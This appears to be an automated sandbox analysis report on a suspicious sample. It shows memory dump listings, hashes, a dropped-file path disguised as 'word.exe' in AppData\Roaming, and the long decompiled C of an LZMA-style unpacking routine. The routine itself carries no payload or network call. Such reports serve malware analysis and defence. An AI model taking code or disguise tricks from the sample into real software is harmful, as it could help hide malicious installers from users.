                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$nsa
                                                          • API String ID: 1716503409-3536471476
                                                          • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                          • Instruction ID: 2f33edf353eb26188edb3eebd43b66705c4d1fe0bdf9ced7dfec13a37dcb2b50
                                                          • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
                                                          • Instruction Fuzzy Hash: 5BF0A037748248BAE7105E55EC04B9B7F9DDF91760F14C02BFE089A1C0D6B09968CBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405ED4 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 586 405ed4-405ef7 587 405f01-405f04 586->587 588 405ef9-405efc 586->588 590 405f07-405f10 587->590 589 406921-406925 588->589 591 405f16 590->591 592 40691e 590->592 593 405fc2-405fc6 591->593 594 406032-406036 591->594 595 405f1d-405f21 591->595 596 40605d-406704 591->596 592->589 597 406872-40687c 593->597 598 405fcc-405fe5 593->598 601 406881-40688b 594->601 602 40603c-406050 594->602 599 405f27-405f34 595->599 600 406909-40691c 595->600 605 406706-40671c 596->605 606 40671e-406734 596->606 597->600 604 405fe8-405fec 598->604 599->592 607 405f3a-405f80 599->607 600->589 601->600 608 406053-40605b 602->608 604->593 609 405fee-405ff4 604->609 610 406737-40673e 605->610 606->610 611 405f82-405f86 607->611 612 405fa8-405faa 607->612 608->594 608->596 615 405ff6-405ffd 609->615 616 40601e-406030 609->616 617 406740-406744 610->617 618 406765-406771 610->618 619 405f91-405f9f GlobalAlloc 611->619 620 405f88-405f8b GlobalFree 611->620 613 405fb8-405fc0 612->613 614 405fac-405fb6 612->614 613->604 614->613 614->614 621 406008-406018 GlobalAlloc 615->621 622 405fff-406002 GlobalFree 615->622 616->608 623 4068f3-4068fd 617->623 624 40674a-406762 617->624 618->590 619->592 626 405fa5 619->626 620->619 621->592 621->616 622->621 623->600 624->618 626->612
                                                          C-Code - Quality: 98%
                                                          			E00405ED4(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406926))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                          0x00405ee4
                                                          0x00405eeb
                                                          0x00405ef1
                                                          0x00405ef7
                                                          0x00000000
                                                          0x00405efb
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f10
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x00000000
                                                          0x00405f1d
                                                          0x00405f21
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f2a
                                                          0x00405f2d
                                                          0x00405f30
                                                          0x00405f32
                                                          0x00405f34
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f3a
                                                          0x00405f3d
                                                          0x00405f3f
                                                          0x00405f40
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f48
                                                          0x00405f4b
                                                          0x00405f50
                                                          0x00405f55
                                                          0x00405f5e
                                                          0x00405f71
                                                          0x00405f74
                                                          0x00405f7d
                                                          0x00405f80
                                                          0x00405fa8
                                                          0x00405fa8
                                                          0x00405faa
                                                          0x00405fb8
                                                          0x00405fb8
                                                          0x00405fbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405fac
                                                          0x00405faf
                                                          0x00405faf
                                                          0x00405fb0
                                                          0x00405fb0
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405f82
                                                          0x00405f86
                                                          0x00405f8b
                                                          0x00405f8b
                                                          0x00405f94
                                                          0x00405f9a
                                                          0x00405f9c
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405ff1
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ff6
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406013
                                                          0x00406015
